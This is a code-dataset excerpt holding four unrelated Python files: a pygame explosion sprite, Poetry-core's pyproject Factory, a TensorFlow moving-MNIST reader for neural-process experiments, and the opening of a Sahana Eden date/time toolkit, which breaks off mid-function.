filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_106_18997
|
import pygame
class Explosion(pygame.sprite.Sprite):
def __init__(self, center, size):
pygame.sprite.Sprite.__init__(self)
self.size = size
self.explosions = []
for i in range(9):
filename = 'explosion_{}.png'.format(i)
img = pygame.image.load(f'assets/explosion/{filename}').convert()
img.set_colorkey((0,0,0))
# img_lg = pygame.transform.scale(img, (75, 75))
self.explosions.append(img)
# img_sm = pygame.transform.scale(img, (32, 32))
# explosions].append(img_sm)
# expl = Explosion(obj.get_position(), 'sm')
self.image = self.explosions[0]
self.rect = self.image.get_rect()
self.rect.center = center
self.frame = 0
self.last_update = pygame.time.get_ticks()
self.frame_rate = 50
self.counter = 0
self.index = 0
def update(self, screen):
explosion_speed = 8
self.counter += 1
if self.counter >= explosion_speed and self.index < len(self.explosions) - 1:
self.counter = 0
self.index += 1
screen.blit(self.explosions[self.index], self.rect.center)
if self.index >= len(self.explosions) - 1 and self.counter >= explosion_speed:
self.kill()
|
the-stack_106_18998
|
import logging
from pathlib import Path
from typing import TYPE_CHECKING
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
from typing import Union
from warnings import warn
from poetry.core.utils.helpers import readme_content_type
if TYPE_CHECKING:
from poetry.core.packages.project_package import ProjectPackage
from poetry.core.packages.types import DependencyTypes
from poetry.core.poetry import Poetry
from poetry.core.spdx.license import License
from poetry.core.version.markers import MarkerTypes
logger = logging.getLogger(__name__)
class Factory:
"""
Factory class to create various elements needed by Poetry.
"""
def create_poetry(
self, cwd: Optional[Path] = None, with_groups: bool = True
) -> "Poetry":
from poetry.core.poetry import Poetry
from poetry.core.pyproject.toml import PyProjectTOML
poetry_file = self.locate(cwd)
local_config = PyProjectTOML(path=poetry_file).poetry_config
# Checking validity
check_result = self.validate(local_config)
if check_result["errors"]:
message = ""
for error in check_result["errors"]:
message += f" - {error}\n"
raise RuntimeError("The Poetry configuration is invalid:\n" + message)
# Load package
name = local_config["name"]
version = local_config["version"]
package = self.get_package(name, version)
package = self.configure_package(
package, local_config, poetry_file.parent, with_groups=with_groups
)
return Poetry(poetry_file, local_config, package)
@classmethod
def get_package(cls, name: str, version: str) -> "ProjectPackage":
from poetry.core.packages.project_package import ProjectPackage
return ProjectPackage(name, version, version)
@classmethod
def configure_package(
cls,
package: "ProjectPackage",
config: Dict[str, Any],
root: Path,
with_groups: bool = True,
) -> "ProjectPackage":
from poetry.core.packages.dependency import Dependency
from poetry.core.packages.dependency_group import DependencyGroup
from poetry.core.spdx.helpers import license_by_id
package.root_dir = root
for author in config["authors"]:
package.authors.append(author)
for maintainer in config.get("maintainers", []):
package.maintainers.append(maintainer)
package.description = config.get("description", "")
package.homepage = config.get("homepage")
package.repository_url = config.get("repository")
package.documentation_url = config.get("documentation")
try:
license_: Optional["License"] = license_by_id(config.get("license", ""))
except ValueError:
license_ = None
package.license = license_
package.keywords = config.get("keywords", [])
package.classifiers = config.get("classifiers", [])
if "readme" in config:
if isinstance(config["readme"], str):
package.readmes = (root / config["readme"],)
else:
package.readmes = tuple(root / readme for readme in config["readme"])
if "platform" in config:
package.platform = config["platform"]
if "dependencies" in config:
group = DependencyGroup("default")
for name, constraint in config["dependencies"].items():
if name.lower() == "python":
package.python_versions = constraint
continue
if isinstance(constraint, list):
for _constraint in constraint:
group.add_dependency(
cls.create_dependency(
name, _constraint, root_dir=package.root_dir
)
)
continue
group.add_dependency(
cls.create_dependency(name, constraint, root_dir=package.root_dir)
)
package.add_dependency_group(group)
if with_groups and "group" in config:
for group_name, group_config in config["group"].items():
group = DependencyGroup(
group_name, optional=group_config.get("optional", False)
)
for name, constraint in group_config["dependencies"].items():
if isinstance(constraint, list):
for _constraint in constraint:
group.add_dependency(
cls.create_dependency(
name,
_constraint,
groups=[group_name],
root_dir=package.root_dir,
)
)
continue
group.add_dependency(
cls.create_dependency(
name,
constraint,
groups=[group_name],
root_dir=package.root_dir,
)
)
package.add_dependency_group(group)
if with_groups and "dev-dependencies" in config:
group = DependencyGroup("dev")
for name, constraint in config["dev-dependencies"].items():
if isinstance(constraint, list):
for _constraint in constraint:
group.add_dependency(
cls.create_dependency(
name,
_constraint,
groups=["dev"],
root_dir=package.root_dir,
)
)
continue
group.add_dependency(
cls.create_dependency(
name, constraint, groups=["dev"], root_dir=package.root_dir
)
)
package.add_dependency_group(group)
extras = config.get("extras", {})
for extra_name, requirements in extras.items():
package.extras[extra_name] = []
# Checking for dependency
for req in requirements:
req = Dependency(req, "*")
for dep in package.requires:
if dep.name == req.name:
dep.in_extras.append(extra_name)
package.extras[extra_name].append(dep)
break
if "build" in config:
build = config["build"]
if not isinstance(build, dict):
build = {"script": build}
package.build_config = build or {}
if "include" in config:
package.include = []
for include in config["include"]:
if not isinstance(include, dict):
include = {"path": include}
formats = include.get("format", [])
if formats and not isinstance(formats, list):
formats = [formats]
include["format"] = formats
package.include.append(include)
if "exclude" in config:
package.exclude = config["exclude"]
if "packages" in config:
package.packages = config["packages"]
# Custom urls
if "urls" in config:
package.custom_urls = config["urls"]
return package
@classmethod
def create_dependency(
cls,
name: str,
constraint: Union[str, Dict[str, Any]],
groups: Optional[List[str]] = None,
root_dir: Optional[Path] = None,
) -> "DependencyTypes":
from poetry.core.packages.constraints import (
parse_constraint as parse_generic_constraint,
)
from poetry.core.packages.dependency import Dependency
from poetry.core.packages.directory_dependency import DirectoryDependency
from poetry.core.packages.file_dependency import FileDependency
from poetry.core.packages.url_dependency import URLDependency
from poetry.core.packages.utils.utils import create_nested_marker
from poetry.core.packages.vcs_dependency import VCSDependency
from poetry.core.semver.helpers import parse_constraint
from poetry.core.version.markers import AnyMarker
from poetry.core.version.markers import parse_marker
if groups is None:
groups = ["default"]
if constraint is None:
constraint = "*"
if isinstance(constraint, dict):
optional = constraint.get("optional", False)
python_versions = constraint.get("python")
platform = constraint.get("platform")
markers = constraint.get("markers")
if "allows-prereleases" in constraint:
message = (
f'The "{name}" dependency specifies '
'the "allows-prereleases" property, which is deprecated. '
'Use "allow-prereleases" instead.'
)
warn(message, DeprecationWarning)
logger.warning(message)
allows_prereleases = constraint.get(
"allow-prereleases", constraint.get("allows-prereleases", False)
)
dependency: Dependency
if "git" in constraint:
# VCS dependency
dependency = VCSDependency(
name,
"git",
constraint["git"],
branch=constraint.get("branch", None),
tag=constraint.get("tag", None),
rev=constraint.get("rev", None),
directory=constraint.get("subdirectory", None),
groups=groups,
optional=optional,
develop=constraint.get("develop", False),
extras=constraint.get("extras", []),
)
elif "file" in constraint:
file_path = Path(constraint["file"])
dependency = FileDependency(
name,
file_path,
groups=groups,
base=root_dir,
extras=constraint.get("extras", []),
)
elif "path" in constraint:
path = Path(constraint["path"])
if root_dir:
is_file = root_dir.joinpath(path).is_file()
else:
is_file = path.is_file()
if is_file:
dependency = FileDependency(
name,
path,
groups=groups,
optional=optional,
base=root_dir,
extras=constraint.get("extras", []),
)
else:
dependency = DirectoryDependency(
name,
path,
groups=groups,
optional=optional,
base=root_dir,
develop=constraint.get("develop", False),
extras=constraint.get("extras", []),
)
elif "url" in constraint:
dependency = URLDependency(
name,
constraint["url"],
groups=groups,
optional=optional,
extras=constraint.get("extras", []),
)
else:
version = constraint["version"]
dependency = Dependency(
name,
version,
optional=optional,
groups=groups,
allows_prereleases=allows_prereleases,
extras=constraint.get("extras", []),
)
if not markers:
marker: "MarkerTypes" = AnyMarker()
if python_versions:
marker = marker.intersect(
parse_marker(
create_nested_marker(
"python_version", parse_constraint(python_versions)
)
)
)
if platform:
marker = marker.intersect(
parse_marker(
create_nested_marker(
"sys_platform", parse_generic_constraint(platform)
)
)
)
else:
marker = parse_marker(markers)
if not marker.is_any():
dependency.marker = marker
dependency.source_name = constraint.get("source")
else:
dependency = Dependency(name, constraint, groups=groups)
return dependency
@classmethod
def validate(
cls, config: Dict[str, Any], strict: bool = False
) -> Dict[str, List[str]]:
"""
Checks the validity of a configuration
"""
from poetry.core.json import validate_object
result: Dict[str, List[str]] = {"errors": [], "warnings": []}
# Schema validation errors
validation_errors = validate_object(config, "poetry-schema")
result["errors"] += validation_errors
if strict:
# If strict, check the file more thoroughly
if "dependencies" in config:
python_versions = config["dependencies"]["python"]
if python_versions == "*":
result["warnings"].append(
"A wildcard Python dependency is ambiguous. "
"Consider specifying a more explicit one."
)
for name, constraint in config["dependencies"].items():
if not isinstance(constraint, dict):
continue
if "allows-prereleases" in constraint:
result["warnings"].append(
f'The "{name}" dependency specifies '
'the "allows-prereleases" property, which is deprecated. '
'Use "allow-prereleases" instead.'
)
# Checking for scripts with extras
if "scripts" in config:
scripts = config["scripts"]
for name, script in scripts.items():
if not isinstance(script, dict):
continue
extras = script["extras"]
for extra in extras:
if extra not in config["extras"]:
result["errors"].append(
f'Script "{name}" requires extra "{extra}" which is not'
" defined."
)
# Checking types of all readme files (must match)
if "readme" in config and not isinstance(config["readme"], str):
readme_types = {readme_content_type(r) for r in config["readme"]}
if len(readme_types) > 1:
result["errors"].append(
"Declared README files must be of same type: found"
f" {', '.join(sorted(readme_types))}"
)
return result
@classmethod
def locate(cls, cwd: Optional[Path] = None) -> Path:
cwd = Path(cwd or Path.cwd())
candidates = [cwd]
candidates.extend(cwd.parents)
for path in candidates:
poetry_file = path / "pyproject.toml"
if poetry_file.exists():
return poetry_file
else:
raise RuntimeError(
f"Poetry could not find a pyproject.toml file in {cwd} or its parents"
)
|
the-stack_106_18999
|
import collections
import math
import numpy as np
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# The (A)NP takes as input a `NPRegressionDescription` namedtuple
# with fields:
# `query`: a tuple containing ((context_x, context_y), target_x)
# `target_y`: a tensor containing the ground truth for the targets to be
# predicted
# `num_total_points`: A vector containing a scalar that
# describes the total
# number of datapoints used (context + target)
# `num_context_points`: A vector containing a scalar that
# describes the number
# of datapoints used as context
# The GPCurvesReader returns the newly sampled data in this format at each
# iteration
NPRegressionDescription = collections.namedtuple(
"NPRegressionDescription",
("query", "target_y", "num_total_points", "num_context_points",
"hyperparams"))
class MnistReader(object):
"""Generates curves using a Gaussian Process (GP).
Supports vector inputs (x) and vector outputs (y). Kernel is
mean-squared exponential, using the x-value l2 coordinate distance scaled
by some factor chosen randomly in a range. Outputs are
independent gaussian processes.
"""
def __init__(self,
batch_size,
max_num_context,
x_size=1,
y_size=1,
testing=False,
len_seq=10,
len_given=5,
len_gen=10,
canvas_size=84,
speed_min=2.0,
speed_max=3.0,
temporal=False,
case=1,
):
"""Creates a regression dataset of functions sampled from a GP.
Args:
batch_size: An integer.
max_num_context: The max number of observations in the context.
x_size: Integer >= 1 for length of "x values" vector.
y_size: Integer >= 1 for length of "y values" vector.
l1_scale: Float; typical scale for kernel distance function.
sigma_scale: Float; typical scale for variance.
testing: Boolean that indicates whether we are testing.
If so there are more targets for visualization.
"""
self._batch_size = batch_size
self._max_num_context = max_num_context
self._x_size = x_size
self._y_size = y_size
self._testing = testing
self._len_seq = len_seq
self._len_given = len_given
self._len_gen = len_gen
self._canvas_size = canvas_size
self._speed_min = speed_min
self._speed_max = speed_max
self._temporal = temporal
self._case = case
self._noise_factor = 0.1
mnist = input_data.read_data_sets("mnist/", one_hot=True)
if testing:
images = mnist.validation.images
else:
images = mnist.train.images
# normalization to [-0.5,0.5]
images = images - 0.5
self._images = tf.constant(images, dtype=tf.float32)
self._num_samples = self._images.shape[0]
self._sample_size = 28
x_values = []
for i in range(canvas_size):
for j in range(canvas_size):
x_values.append([i,j])
# normalization to [-1,1]
x_values = np.array(x_values)
x_values = 2 * (x_values / (canvas_size-1)) - 1
self._x_values = tf.constant(np.array(x_values),dtype=tf.float32)
def make_canvas(self, x_loc, y_loc, samples):
x_pad = tf.stack(
[x_loc, self._canvas_size-(x_loc+self._sample_size)], axis=1)
y_pad = tf.stack(
[y_loc, self._canvas_size-(y_loc+self._sample_size)], axis=1)
pad = tf.cast(tf.stack([x_pad, y_pad], axis=1),dtype=tf.int32)
canvas = []
for b_idx in range(self._batch_size):
canvas.append(tf.pad(samples[b_idx], pad[b_idx], 'CONSTANT',
constant_values=-0.5))
canvas = tf.stack(canvas, axis=0)
return canvas
def bounce(self, loc, vel):
loc_res, vel_res = [], []
for b_idx in range(self._batch_size):
loc_tmp = tf.cond(tf.less(loc[b_idx],0),
lambda: -1 * loc[b_idx],
lambda: loc[b_idx])
vel_tmp = tf.cond(tf.less(loc[b_idx],0),
lambda: -1 * vel[b_idx],
lambda: vel[b_idx])
loc_tmp = tf.cond(tf.greater_equal(
loc[b_idx],self._canvas_size - self._sample_size),
lambda: 2*(self._canvas_size-self._sample_size)-1*loc[b_idx],
lambda: loc_tmp)
vel_tmp = tf.cond(tf.greater_equal(
loc[b_idx],self._canvas_size - self._sample_size),
lambda: -1 * vel[b_idx],
lambda: vel_tmp)
loc_res.append(loc_tmp)
vel_res.append(vel_tmp)
loc = tf.stack(loc_res, axis=0)
vel = tf.stack(vel_res, axis=0)
return loc, vel
def generate_temporal_curves(self, seed=None):
# Select samples
idx = tf.random_shuffle(tf.range(self._num_samples), seed=seed)
idx = idx[:self._batch_size]
samples = tf.reshape(tf.gather(self._images, idx, axis=0),
[self._batch_size, self._sample_size, self._sample_size])
# initial locations
if self._canvas_size == self._sample_size:
x_loc = tf.constant(np.zeros(self._batch_size), dtype=tf.float32)
y_loc = tf.constant(np.zeros(self._batch_size), dtype=tf.float32)
else:
x_loc = tf.random_uniform([self._batch_size],
0, self._canvas_size-self._sample_size,
seed=seed, dtype=tf.float32)
y_loc = tf.random_uniform([self._batch_size],
0, self._canvas_size-self._sample_size,
seed=seed, dtype=tf.float32)
# Set dynamics
if self._speed_min == self._speed_max:
speed = tf.constant(self._speed_min * np.ones(self._batch_size),
dtype=tf.float32)
else:
speed = tf.random_uniform([self._batch_size],
self._speed_min, self._speed_max, seed=seed)
direc = tf.random_uniform([self._batch_size], 0.0, 2*math.pi,
seed=seed)
y_vel = speed * tf.math.sin(direc)
x_vel = speed * tf.math.cos(direc)
# initial canvas
y_loc_int = tf.cast(y_loc, dtype=tf.int32)
x_loc_int = tf.cast(x_loc, dtype=tf.int32)
canvas = self.make_canvas(x_loc_int, y_loc_int, samples)
curve_list = []
if (self._case==2) or (self._case==3):
# sparse time or long term tracking
idx = tf.random_shuffle(tf.range(self._len_seq),
seed=seed)[:(self._len_given)]
for t in range(self._len_seq):
if seed is not None:
_seed = seed * t
else:
_seed = seed
if self._case==1: # using len_given
if t < self._len_given:
num_context = tf.random_uniform(shape=[], minval=5,
maxval=self._max_num_context, dtype=tf.int32,
seed=_seed)
else:
num_context = tf.constant(0)
if self._case==2: # sparse time
nc_cond = tf.where(tf.equal(idx,t))
nc_cond = tf.reshape(nc_cond, [-1])
num_context = tf.cond(tf.equal(tf.size(nc_cond),0),
lambda:tf.constant(0),
lambda:tf.random_uniform(shape=[], minval=5,
maxval=self._max_num_context,
dtype=tf.int32, seed=_seed))
if self._case==3: # long term tracking
nc_cond = tf.where(tf.equal(idx,t))
nc_cond = tf.reshape(nc_cond, [-1])
num_context = tf.cond(tf.equal(tf.size(nc_cond),0),
lambda:tf.constant(0),
lambda:tf.constant(30))
if self._temporal:
encoded_t = None
else:
encoded_t = 0.25 + 0.5*t/self._len_seq
curve_list.append(self.generate_curves(canvas, num_context,
_seed, encoded_t))
vel_noise = y_vel * self._noise_factor * tf. random_normal(
[self._batch_size], seed=_seed)
y_loc += y_vel + vel_noise
y_loc, y_vel = self.bounce(y_loc, y_vel)
vel_noise = x_vel * self._noise_factor * tf. random_normal(
[self._batch_size], seed=_seed)
x_loc += x_vel + vel_noise
x_loc, x_vel = self.bounce(x_loc, x_vel)
y_loc_int = tf.cast(y_loc, dtype=tf.int32)
x_loc_int = tf.cast(x_loc, dtype=tf.int32)
canvas = self.make_canvas(x_loc_int, y_loc_int, samples)
if self._testing:
for t in range(self._len_seq,self._len_seq+self._len_gen):
if seed is not None:
_seed = seed * t
else:
_seed = seed
num_context = tf.constant(0)
if self._temporal:
encoded_t = None
else:
encoded_t = 0.25 + 0.5*t/self._len_seq
curve_list.append(self.generate_curves(canvas,
num_context,
_seed,
encoded_t))
vel_noise = y_vel * self._noise_factor * tf.random_normal(
[self._batch_size], seed=_seed)
y_loc += y_vel + vel_noise
y_loc, y_vel = self.bounce(y_loc, y_vel)
vel_noise = x_vel * self._noise_factor * tf.random_normal(
[self._batch_size], seed=_seed)
x_loc += x_vel + vel_noise
x_loc, x_vel = self.bounce(x_loc, x_vel)
y_loc_int = tf.cast(y_loc, dtype=tf.int32)
x_loc_int = tf.cast(x_loc, dtype=tf.int32)
canvas = self.make_canvas(x_loc_int, y_loc_int, samples)
context_x_list, context_y_list = [], []
target_x_list, target_y_list = [], []
num_total_points_list = []
num_context_points_list = []
for t in range(len(curve_list)):
(context_x, context_y), target_x = curve_list[t].query
target_y = curve_list[t].target_y
num_total_points_list.append(curve_list[t].num_total_points)
num_context_points_list.append(curve_list[t].num_context_points)
context_x_list.append(context_x)
context_y_list.append(context_y)
target_x_list.append(target_x)
target_y_list.append(target_y)
query = ((context_x_list, context_y_list), target_x_list)
return NPRegressionDescription(
query=query,
target_y=target_y_list,
num_total_points=num_total_points_list,
num_context_points=num_context_points_list,
hyperparams=[tf.constant(0)])
def generate_curves(self, canvas, num_context=3,
seed=None, encoded_t=None):
"""Builds the op delivering the data.
Generated functions are `float32` with x values between -2 and 2.
Returns:
A `CNPRegressionDescription` namedtuple.
"""
# If we are testing we want to have more targets and have them evenly
# distributed in order to plot the function.
num_total_points = self._canvas_size * self._canvas_size
if self._testing:
num_target = num_total_points
else:
maxval = self._max_num_context - num_context + 1
num_target = tf.random_uniform(shape=(), minval=1,
maxval=maxval,
dtype=tf.int32, seed=seed)
x_values = tf.tile(
tf.expand_dims(self._x_values,
axis=0),[self._batch_size, 1, 1])
# [batch_size, num_total_points, 1]
y_values = tf.reshape(canvas, [self._batch_size, num_total_points, 1])
if self._testing:
# Select the targets
target_x = x_values
target_y = y_values
if encoded_t is not None:
target_x = tf.concat([
target_x,
tf.ones([self._batch_size, num_total_points, 1]) * encoded_t
], axis=-1)
# Select the observations
idx = tf.random_shuffle(tf.range(num_target), seed=seed)
context_x = tf.gather(x_values, idx[:num_context], axis=1)
context_y = tf.gather(y_values, idx[:num_context], axis=1)
if encoded_t is not None:
context_x = tf.concat([
context_x,
tf.ones([self._batch_size, num_context, 1]) * encoded_t
], axis=-1)
else:
# Select the targets which will consist of the context points
# as well as some new target points
idx = tf.random_shuffle(tf.range(num_total_points), seed=seed)
target_x = tf.gather(x_values, idx[:num_target + num_context], axis=1)
target_y = tf.gather(y_values, idx[:num_target + num_context], axis=1)
if encoded_t is not None:
target_x = tf.concat([
target_x,
tf.ones([self._batch_size, num_target + num_context, 1])
* encoded_t], axis=-1)
# Select the observations
context_x = tf.gather(x_values, idx[:num_context], axis=1)
context_y = tf.gather(y_values, idx[:num_context], axis=1)
if encoded_t is not None:
context_x = tf.concat([
context_x,
tf.ones([self._batch_size, num_context, 1]) * encoded_t
], axis=-1)
query = ((context_x, context_y), target_x)
return NPRegressionDescription(
query=query,
target_y=target_y,
num_total_points=tf.shape(target_x)[1],
num_context_points=num_context,
hyperparams=[tf.constant(0)])
|
the-stack_106_19003
|
"""
Date/Time and Calendar Toolkit
Copyright: 2015-2022 (c) Sahana Software Foundation
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("ISOFORMAT",
"S3DateTime",
"S3Calendar",
"S3DateTimeParser",
"S3DateTimeFormatter",
"S3DefaultTZ",
"s3_parse_datetime",
"s3_format_datetime",
"s3_decode_iso_datetime",
"s3_encode_iso_datetime",
"s3_utc",
"s3_get_tzinfo",
"s3_relative_datetime",
)
import datetime
try:
import dateutil
import dateutil.parser
import dateutil.tz
except ImportError:
import sys
sys.stderr.write("ERROR: python-dateutil module needed for date handling\n")
raise
import math
import re
import time
from gluon import current
# =============================================================================
# Constants
#
ISOFORMAT = "%Y-%m-%dT%H:%M:%S" #: ISO 8601 Combined Date+Time format
OFFSET = re.compile(r"([+|-]{0,1})(\d{1,2}):(\d\d)")
RELATIVE = re.compile(r"([+-]{0,1})([0-9]*)([YMDhms])")
SECONDS = {"D": 86400, "h": 3600, "m": 60, "s": 1}
# =============================================================================
class S3DateTime:
"""
Toolkit for date+time parsing/representation
"""
# -------------------------------------------------------------------------
@classmethod
def date_represent(cls, dt, format=None, utc=False, calendar=None):
"""
Represent the date according to deployment settings &/or T()
Args:
dt: the date (datetime.date or datetime.datetime)
format: the format (overrides deployment setting)
utc: the date is given in UTC
calendar: the calendar to use (defaults to current.calendar)
"""
if not format:
format = current.deployment_settings.get_L10n_date_format()
if calendar is None:
calendar = current.calendar
elif isinstance(calendar, str):
calendar = S3Calendar(calendar)
if dt:
if utc:
dt = cls.to_local(dt)
dtstr = calendar.format_date(dt, dtfmt=format, local=True)
else:
dtstr = current.messages["NONE"]
return dtstr
# -----------------------------------------------------------------------------
@classmethod
def datetime_represent(cls, dt, format=None, utc=False, calendar=None):
"""
Represent the datetime according to deployment settings &/or T()
Args:
dt: the datetime
utc: the datetime is given in UTC
calendar: the calendar to use (defaults to current.calendar)
"""
if format is None:
format = current.deployment_settings.get_L10n_datetime_format()
if calendar is None:
calendar = current.calendar
elif isinstance(calendar, str):
calendar = S3Calendar(calendar)
if dt:
if utc:
dt = cls.to_local(dt)
dtstr = calendar.format_datetime(dt, dtfmt=format, local=True)
else:
dtstr = current.messages["NONE"]
return dtstr
# -----------------------------------------------------------------------------
@classmethod
def time_represent(cls, time, format=None, utc=False):
"""
Represent the date according to deployment settings &/or T()
Args:
time: the time
format: the time format (overrides deployment setting)
utc: the time is given in UTC
"""
settings = current.deployment_settings
if format is None:
format = settings.get_L10n_time_format()
if time and utc:
# Make sure to use datetime.datetime (to support timedelta)
if not isinstance(time, datetime.datetime):
today = datetime.datetime.utcnow().date()
time = datetime.datetime.combine(today, time)
time = cls.to_local(time)
if isinstance(time, datetime.datetime):
# Prevent error with dates<1900: convert into datetime.time
time = time.time()
if time:
try:
return time.strftime(str(format))
except AttributeError:
# Invalid argument type
raise TypeError("Invalid argument type: %s" % type(time))
else:
return current.messages["NONE"]
# -----------------------------------------------------------------------------
@classmethod
def to_local(cls, dt):
"""
Convert a date or datetime to local timezone
Args:
dt: the date/datetime; if it is tz-naive it is assumed to be in UTC
Returns:
a tz-naive datetime in local timezone
"""
if not dt:
return None
tzinfo = s3_get_tzinfo()
if tzinfo:
if not isinstance(dt, datetime.datetime):
# Compute breakpoint local time for UTC date
combine = datetime.datetime.combine
bp = cls.to_utc(combine(dt, datetime.time(8, 0, 0))).time()
dt = combine(dt, bp)
if dt.tzinfo is None:
dt = dt.replace(tzinfo=dateutil.tz.tzutc())
dt = dt.astimezone(tz=tzinfo).replace(tzinfo=None)
else:
offset = cls.get_offset_value(cls.get_utc_offset())
if offset:
delta = datetime.timedelta(seconds=offset)
else:
delta = datetime.timedelta(0)
if not isinstance(dt, datetime.datetime):
# Compute breakpoint local time for UTC date
combine = datetime.datetime.combine
bp = (combine(dt, datetime.time(8, 0, 0)) - delta).time()
dt = combine(dt, bp)
if dt.tzinfo is not None:
dt = dt.astimezone(tz=dateutil.tz.tzutc()).replace(tzinfo=None)
dt = dt + delta
return dt
# -----------------------------------------------------------------------------
@classmethod
def to_utc(cls, dt):
"""
Convert a date or datetime to UTC
Args:
dt: the date or datetime; if it is tz-naive it is assumed to
be in local time
Returns:
tz-naive datetime in UTC
"""
if not dt:
return None
date_only = not isinstance(dt, datetime.datetime)
if date_only or not dt.tzinfo:
tzinfo = s3_get_tzinfo()
if tzinfo:
if date_only:
# Compute UTC date for 08:00 local time
dt = datetime.datetime.combine(dt, datetime.time(8, 0, 0))
dt = dt.replace(tzinfo=tzinfo)
else:
offset = cls.get_offset_value(cls.get_utc_offset())
if date_only:
# Compute UTC date for 08:00 local time
dt = datetime.datetime.combine(dt, datetime.time(8, 0, 0))
dt = dt - datetime.timedelta(seconds=offset)
if dt.tzinfo:
dt = dt.astimezone(tz=dateutil.tz.tzutc()).replace(tzinfo=None)
return dt
#--------------------------------------------------------------------------
@staticmethod
def get_utc_offset():
"""
Get the current UTC offset for the client, fallback if the
client does not support timezone introspection and no default
timezone is configured
"""
offset = None
session = current.session
request = current.request
# 1st choice is what the client provides in the hidden form
# field (for form POSTs)
offset = request.post_vars.get("_utc_offset", None)
if offset:
offset = int(offset)
utcstr = offset < 0 and "+" or "-"
hours = abs(int(offset/60))
minutes = abs(int(offset % 60))
offset = "%s%02d%02d" % (utcstr, hours, minutes)
if not offset:
# 2nd choice is the previous value from the current session
offset = session.s3.utc_offset
else:
# Remember it
session.s3.utc_offset = offset
return offset
# -----------------------------------------------------------------------------
@staticmethod
def get_offset_value(string):
"""
Convert an UTC offset string into a UTC offset value in seconds
Args:
string: the UTC offset in hours as string, valid formats
are: "+HH:MM", "+HHMM", "+HH" (positive sign can
be omitted), can also recognize decimal notation
with "." as mark
"""
if not string:
return 0
sign = 1
offset_hrs = offset_min = 0
if isinstance(string, (int, float)):
offset_hrs = string
elif isinstance(string, str):
if string[:3] == "UTC":
string = string[3:]
string = string.strip()
match = OFFSET.match(string)
if match:
groups = match.groups()
if groups[0] == "-":
sign = -1
offset_hrs = int(groups[1])
offset_min = int(groups[2])
elif "." not in string:
try:
offset_hrs = int(string)
except ValueError:
return 0
if offset_hrs < -99 or offset_hrs > 99:
if offset_hrs < 0:
sign = -1
offset_hrs, offset_min = divmod(abs(offset_hrs), 100)
else:
try:
offset_hrs = float(string)
except ValueError:
return 0
else:
return 0
return sign * (3600 * offset_hrs + 60 * offset_min)
# =============================================================================
class S3Calendar:
"""
Calendar Base Class (implementing the Gregorian Calendar)
Subclasses define their own CALENDAR name, and are registered
with this name in the calendars dict in S3Calendar._set_calendar().
"""
CALENDAR = "Gregorian"
# -------------------------------------------------------------------------
# Constants to be implemented by subclasses
# -------------------------------------------------------------------------
JDEPOCH = 1721425.5 # first day of this calendar as Julian Day number
MONTH_NAME = ("January", "February", "March",
"April", "May", "June",
"July", "August", "September",
"October", "November", "December",
)
MONTH_ABBR = ("Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec",
)
MONTH_DAYS = (31, (28, 29), 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)
FIRST_DOW = 1 # Monday
# -------------------------------------------------------------------------
# Methods to be implemented by subclasses
# -------------------------------------------------------------------------
@classmethod
def from_jd(cls, jd):
"""
Convert a Julian day number to a year/month/day tuple
of this calendar, to be implemented by subclass
Args:
jd: the Julian day number
"""
# Gregorian calendar uses default method
return cls._jd_to_gregorian(jd)
# -------------------------------------------------------------------------
@classmethod
def to_jd(cls, year, month, day):
"""
Convert a year/month/day tuple of this calendar into
a Julian day number, to be implemented by subclass
Args:
year: the year number
month: the month number
day: the day-of-month number
"""
# Gregorian calendar uses default method
return cls._gregorian_to_jd(year, month, day)
# -------------------------------------------------------------------------
# Common Interface Methods (must not be implemented by subclasses):
# -------------------------------------------------------------------------
@property
def name(self):
""" Get the name of the current """
name = self._name
if not name:
name = current.deployment_settings.get_L10n_calendar()
if not name:
name = self.CALENDAR
return name
# -------------------------------------------------------------------------
@property
def calendar(self):
""" Get the current calendar """
calendar = self._calendar
if calendar is None:
calendar = self._set_calendar(self.name)
return calendar
# -------------------------------------------------------------------------
@property
def first_dow(self):
""" Get the first day of the week for this calendar """
calendar = self.calendar
first_dow = calendar._first_dow
if first_dow is None:
# Deployment setting?
first_dow = current.deployment_settings.get_L10n_firstDOW()
if first_dow is None:
# Calendar-specific default
first_dow = calendar.FIRST_DOW
calendar._first_dow = first_dow
return first_dow
# -------------------------------------------------------------------------
def parse_date(self, dtstr, dtfmt=None, local=False):
"""
Parse a datetime string according to this calendar
Args:
dtstr: the datetime as string
dtfmt: the datetime format (strptime), overrides default
local: whether the default format is local (=deployment
setting) or ISO
Returns:
the datetime (datetime.datetime)
"""
if dtstr is None:
return None
# Default format
if dtfmt is None:
if local:
dtfmt = current.deployment_settings.get_L10n_date_format()
else:
dtfmt = "%Y-%m-%d" # ISO Date Format
# Use the current calendar
calendar = self.calendar
# Parse the dtstr
try:
timetuple = calendar._parse(dtstr, dtfmt)
except (ValueError, TypeError):
return None
# Convert timetuple to Gregorian calendar
timetuple = calendar._gdate(timetuple)
# Convert into datetime
dt = datetime.datetime(*timetuple)
return dt.date()
# -------------------------------------------------------------------------
def parse_datetime(self, dtstr, dtfmt=None, local=False):
"""
Parse a datetime string according to this calendar
Args:
dtstr: the datetime as string
dtfmt: the datetime format (strptime)
local: whether the default format is local (=deployment
setting) or ISO
Returns:
the datetime (datetime.datetime)
"""
if dtstr is None:
return None
# Default format
if dtfmt is None:
if local:
